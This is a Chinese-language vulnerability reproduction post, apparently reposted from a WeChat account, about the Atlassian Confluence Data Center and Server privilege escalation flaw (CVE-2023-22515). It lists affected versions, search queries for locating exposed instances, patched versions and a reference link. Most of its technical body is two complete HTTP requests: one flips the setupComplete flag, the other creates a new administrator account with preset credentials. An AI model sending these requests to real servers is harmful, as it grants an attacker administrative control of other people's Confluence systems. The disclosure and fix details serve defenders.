0x01 阅读须知
天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
(一) Atlassian Confluence Data Center & Serve
影响版本
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
app="Atlassian-Confluence"
app.name="Confluence"
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Encoding: gzip
SL-CE-SUID: 91
添加管理员账号
POST /setup/setupadministrator.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
username=newadmin1&fullName=newadmin1&email=1234567123@qq.comt&password=newPassword1&confirm=newPassword1&setup-next-button=Next
凭借新添加的账号进行登录
(三) 漏洞原理分析
参考地址:
https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
更多漏洞POC发布在知识星球
0x03 修复方案
官方修复缓解措施
补丁链接
目前官方已有可更新版本,建议受影响用户升级至安全版本:
Confluence Data Center and Confluence Server >= 8.3.3
Confluence Data Center and Confluence Server >= 8.4.3
Confluence Data Center and Confluence Server >= 8.5.2
注:Atlassian Cloud 站点不受此漏洞的影响。
原文始发于微信公众号(白帽文库):【漏洞复现】Atlassian Confluence Data Center and Server 权限提升漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论